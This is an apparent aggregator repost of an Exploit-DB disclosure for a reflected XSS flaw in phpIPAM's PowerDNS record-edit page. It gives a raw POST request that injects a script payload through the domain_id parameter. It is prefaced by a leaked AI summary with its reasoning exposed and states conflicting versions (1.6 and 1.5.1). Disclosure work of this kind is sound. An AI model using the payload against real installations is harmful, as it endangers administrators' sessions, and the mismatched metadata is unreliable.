[webapps] phpIPAM 1.6 - Reflected-Cross-Site Scripting (XSS)
嗯,用户让我总结一下这篇文章的内容,控制在100字以内,而且不需要用“文章内容总结”这样的开头。好的,我先看看文章讲的是什么。 文章标题是phpIPAM 1.6的反射型跨站脚本(XSS)漏洞。作者是CodeSecLab,日期是2025年11月25日。软件版本是1.5.1,测试环境是Windows,CVE编号是CVE-2024-41357。 然后看漏洞描述,作者提供了一个POC,通过发送一个POST请求到特定的PHP文件来触发XSS。需要以管理员身份登录才能满足条件。攻击载荷是在domain_id参数中注入了<script>alert(1)</script>这样的代码。 所以总结的话,应该包括漏洞类型、影响版本、攻击方式以及触发条件。控制在100字以内的话,大概需要简洁地表达这些信息。 可能的结构:phpIPAM 1.6存在反射型XSS漏洞,在特定条件下通过POST请求注入恶意脚本,管理员用户容易受影响。 检查一下字数是否合适,确保没有遗漏关键点。 </think> phpIPAM 1.6 存在反射型跨站脚本(XSS)漏洞,在特定条件下通过 POST 请求注入恶意脚本,管理员用户易受影响。 2025-12-2 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:1 收藏

# Exploit Title: phpIPAM 1.6 - Reflected Cross-Site Scripting (XSS)
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/phpipam/phpipam/
# Software Link: https://github.com/phpipam/phpipam/
# Version: 1.5.1 
# Tested on: Windows
# CVE : CVE-2024-41357


Proof Of Concept
# PoC to trigger XSS vulnerability in phpipam 1.6
# Ensure you are logged in as an admin user to satisfy the admin check condition.
# Send the following POST request to trigger the XSS vulnerability:

POST /app/admin/powerDNS/record-edit.php HTTP/1.1
Host: phpipam
Content-Type: application/x-www-form-urlencoded
Content-Length: <calculated_length>

action=add&domain_id=%22%3E%3Cscript%3Ealert(1)%3C/script%3E

# This will execute the alert(1) script when the response is rendered in the browser.
            

文章来源: https://www.exploit-db.com/exploits/52442
如有侵权请联系:admin#unsafe.sh